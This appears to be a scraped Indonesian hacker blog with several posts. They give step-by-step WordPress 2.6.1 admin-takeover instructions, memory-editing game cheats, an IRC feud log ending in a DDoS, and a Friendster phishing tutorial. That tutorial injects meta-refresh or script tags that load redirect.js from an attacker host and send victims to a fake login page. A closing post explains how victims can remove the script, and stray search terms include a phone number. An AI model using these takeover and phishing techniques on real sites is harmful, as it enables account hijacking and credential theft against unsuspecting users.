stmikbg-dot-com

Ini judul yang sangat bahaya, berkicau dirumah sendiri sama saja dengan mengundang penyerang. Tapi whatever ini adalah sebuah pembelajaran. Saat ini saya masih menggunakan wp ver 2.6.1 yang disinyalir punya lubang keamanan. Lubang kemanan ini bisa diexploitasi jika web yang menggunakan wp 2.6.1 memperbolehkan pendaftaran user baru.

Lubang keamanan ini bisa menginjeksi password admin secara remote.  Adapun step by step untuk mendapatkan password adminnya yakni :

1. go to url: server.com/wp-login.php?action=register
2. register as:
login: admin                                                       x
email: your email
^ admin[55 space chars]x

now, we have duplicated 'admin' account in database

3. go to url: server.com/wp-login.php?action=lostpassword
4. write your email into field and submit this form
5. check your email and go to reset confirmation link
6. admin's password changed, but new password will be send to correct admin email ;/

Jadi pengguna wp-2.6.1 disarankan untuk melakukan update keversi 2.6.2

Kali ini gw bingung mau posting apa, terpaksa kali ini gw ngakalin games, boring juga kalo maen game kalah terus, abis itu kena bantai terus, mau naikin level juga rada susah karena simpanan emas, air, makanan dan bahan-bahan lainnya masih minim. Sebenarnya ini trik lama dan bagi para gamers sejati saya mohon maaf atas postingan saya ini.

Secara teori, nilai-nilai untuk counter berupa score, jumlah uang untuk tiap level pada game, serta point-point lainnya yang diharuskan dikumpulkan ketika kita main game, sebenarnya hanyalah angka-angka yang bersifat dinamis dan tersimpan pada memori komputer. Karena angka-angka dinamis ini letaknya dimemory saat game dijalankan tentu dong bisa kita manipulasi.

Untuk memanipulasi kita memerlukan tools yang bisa mencari nilai byte dari angka tersebut, tools ini harus mampu membaca lokasi memory, melakukan rewrite pada lokasi memory tertentu. Seperti remote exploit aja, menulis ulang memory untuk mendapatkan akses root, Tapi kali ini kita akan menulis ulang memory untuk mendapatkan score tertinggi dan koleksi uang virtual yang dibutuhkan untuk membeli equipment pada game yang anda mainkan.

Adapun tools ini bisa seperti “Tsearch” ataupun tools lainnya untuk manipulasi memory. “ Tsearch (similar to ArtMoney and the open source Cheat Engine) is a memory scanner/debugger utility developed by Corsica Productions. Tsearch’s primary function is to scan open processes for byte addresses; restricting searches to either “Exact Value”, “Range” or “Unknown Values”. The searches can be refined by using a “Search Next” (or sieve) option: this re-searches already found results to display results suiting a further refined criterion. Tsearch also features a hex editor and “auto hack” option, and is commonly used within the game hacking community to develop third-party game “trainers” and “hacks”.

Tsearch’s features can be enhanced when using the “Trainer Maker Toolkit” (TMK) – a highly developed form .exe maker which takes tsearch’s “poke” addresses and adapts them into a third-party program. Please note that online games CAN be hacked using Tsearch. However, many games are constantly watching for any inconsistency in the data. If an administrator notices that you are cheating, you may be banned from the website or worse. Also, Tsearch may not be as efficient on server-side games. Thus, leveling up, earning money, and many other things that users of Tsearch want to do may prove to be more difficult and time consuming than doing it without cheating.“

tsearch software

Dengan tools ini anda bisa melakukan pencarian byte value untuk score, jumlah uang ataupun jumlah byte yang ada digame yang anda mainkan untuk membeli peralatan atau mungkin untuk menyelesaikan level game anda.

Incoming search terms:

• manipulasi wpepro
• software Tsearch terbaru
• TSearch

Gara-gara seorang personil #gokil FS nya diganti user name dan diprofilenya ada “Hacked by Broklyn”, pasukan-pasukan gokil memulai perang terbuka. Ok, no problem

* Joins: zxvf (hendy@my.lovely.girlfriend.is-sexy.be) I change this nick for next victim.

Tanpa basa-basi dan langsung vonis, ip psybnc gw dieksekusi yah kena DDOS deh dan sampai detik ini attackingnya lom selesai, sambil menunggu dan persiapan untuk perang yang akan memakan waktu yang panjang, gw santai and ngeblog dulu ah.

* Joins: zxvf (hendy@my.lovely.girlfriend.is-sexy.be)
* zxvf slaps |SlackWare| around a bit with a large (.)y(.)
<|SlackWare|> wow
<|SlackWare|> zxvf?
<|SlackWare|> anak gokil
<zxvf> hehehhehe. alow bro
<|SlackWare|> ya om
<|SlackWare|> 
<|SlackWare|> utusannya arien om?
<zxvf> ¿?
* zxvf is now known as zxvf895
<|SlackWare|> tumben kesini
<|DarK_LorD|> Wuihhhh koq aq bisa ada disini ya????
<zxvf895> oh bukan utusan
<|SlackWare|> then?
* zxvf895 is now known as zxvf
<zxvf> cuma mau tanya aja
<zxvf> ada mslh apa sbnr nya kalian sama arien
* |DarK_LorD| bagi-in anak² #planetwar BigMac -Mc.Donald- biar 'gak kélaparan gara² châtting ...
<|SlackWare|> aku gak ada masalah
<|SlackWare|> memang knpa?
<|SlackWare|> tuh piter pnya masalah
<zxvf> ya aku denger aja ada mslh
<zxvf> 0ow
<zxvf> kalian yg hack FS arien kah ?
<zxvf> sm flood dia kmrn ?
<|SlackWare|> ??? maksudnya?
<|SlackWare|> hack FS gt
<|SlackWare|> wew
<|SlackWare|> flood
<|SlackWare|> aku gak online
<zxvf> broklyn <=- kenal ?
<|SlackWare|> sore cuman cek email ama login mirc sbntr
<|SlackWare|> broklyn kenal dong
<|SlackWare|> itu kan tim gw
<|SlackWare|> programer
<zxvf> soalnya yg aku dengar di FS nya ada hacked by broklyn
<|SlackWare|> yaaa
<|SlackWare|> gw liat kok
<zxvf> sama team kalian ?
<|SlackWare|> trs kmrn gw dijadiin tersangka
<zxvf> sama team kalian ?
<|SlackWare|> broklyn itu tim programer gw
<|SlackWare|> mmg knapa?
<zxvf> itu di hack nya sma team kalian ?
<|SlackWare|> personal
<|SlackWare|> jgn2 bawa2 team
<|SlackWare|> lagian kok gara2 FS harus ribut
<|SlackWare|> jumatan euy
<zxvf> Ok skrg yg flood arien sapa ?
<|SlackWare|> nah itu gw gak tau
<|SlackWare|> mang flood itu apa?
* Joins: Guest15960 (~chu@server15.01domain.net)
<zxvf> ¿?
-----<whois>----------------------------
» Nick: zxvf
» Name: ÅRMÃGËÐDÖÑ
» Hostmask: hendy@my.lovely.girlfriend.is-sexy.be
» Channels: #planetwar @#24jam @#gokil @#LifeStream #madat +#deathwars @#avatar #jampank
» Server: punch.va.us.dal.net
» Registered Nickname: Yes.
-----</whois>---------------------------
<Guest15960> ?
* Guest15960 is now known as AirSnort|Root2|
<zxvf> oh ya bro
<zxvf> broklyn team kamu kan ?
<|SlackWare|> yaa
<zxvf> yo wes gini aja
<|SlackWare|> mang kenapa?
<zxvf> coba sek bilangkan kalo mau rusuh jg ncari yg ga bisa apa² kayak arien gitu 
<|SlackWare|> ciee
<|SlackWare|> so?
<zxvf> yang aku denger kamu juga sering rusuh toh
<|SlackWare|> rusuh
<|SlackWare|> mang kenapa
<|SlackWare|> suka dong
<|SlackWare|> beh
<|SlackWare|> lsg DDOS ip gw
* Disconnected
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Destination host unreachable.
Destination host unreachable.
Destination host unreachable.
Destination host unreachable.
Destination host unreachable.

Aku cuma bisa bergumam, War is starting now, saat ini shell gw lemot, yang ada juga cuman windows 2003 server, trs Linux web176.opentransfer.com 2.6.26.2 belum begitu optimal tapi tunggu seiring perjalanan waktu, all #sysHACK and #samarindahack crew not die. Jangan engkau bangunkan singa tidur.

Incoming search terms:

• memperbaiki destination host unreachable
• z4k1
• trick nick panjang
• situs pelacur di mirc
• server amikom indo net id di hack
• request time out apakah karena di hack
• pantat berdarah
• nomer handphone pelacur di mataram/senggigi
• no hp pelacur lombok
• Z4k1 mataram

Untuk mendapatkan password user friendster, susah-susah gampang, dibilang gampang karena kita hanya memasukkan sebuah script untuk melakukan redirect ke halaman fakelogin.
Kenapa harus fakelogin?
Karena dengan menggunakan fakelogin kita akan menjebak sipemilik friendster (korban) untuk melakukan login ulang.
Beberapa tehnik untuk melakukan redirecting kehalaman fakelogin

1. Menggunakan meta content, untuk redirect keweb fake login seperti contoh dibawah ini

<meta content='0;url=http://stmikbg.com/fs' http-equiv='Refresh' />

2. Menggunakan tag script dengan mengarahkan script sourcenya keweb tempat halaman fakelogin, untuk langkah kedua ada beberapa langkah yang harus diperhatikan diantaranya :

• Memasukkan tag script kecomment korban, script yang dimasukkan adalah

<pre><script src="http://yourwebfakelogin.com/redirect.js"></script></pre>

• Membuat file ‘redirect.js’ diurl yang dituju oleh script yang dimasukkan sebelumnya, adapun script yang dimasukkan ini yakni

  document.location = "http://yourwebfakelogin.com";

Langkah selanjutnya membuat halaman fakelogin yang mirip dengan halaman login friendster aslinya.

Incoming search terms:

• 085729370397

Akun friendster saya sempat tidak bisa saya buka, ketika saya view profile saya langsung dirediret kehalaman lain. Saya teliti ternyata seseorang mensubmit script lewat comment. Friendster kenapa tidak ngeblok tag <script> seh, jadinya FS gw dihack orang deh.

Tapi bagaimanapun kita yang memiliki akun FS tetap sebagai pemegang kendali, setelah sekian lama gw coba akhirnya saya bisa menghapus tag <script> tadi. Bagi pengguna modzila firefox cukup dengan jalan membuka pop-menu tools kemudian option pada tab content kemudian hilangkan centang pada Enable Javascript, Enable Java seperti yang ditampilkan pada gambar dibawah ini.

Tekan OK, dan buka kembali comment pada akun FS anda, periksa kira-kira comment mana yang berisi script dibawah ini

<script src="http://friendsterworm.fileave.com/redirect.js"></script>

Hapus comment tersebut, biasanya comment seperti ini tag scriptnya tidak kelihatan, coba anda cek pada view source code.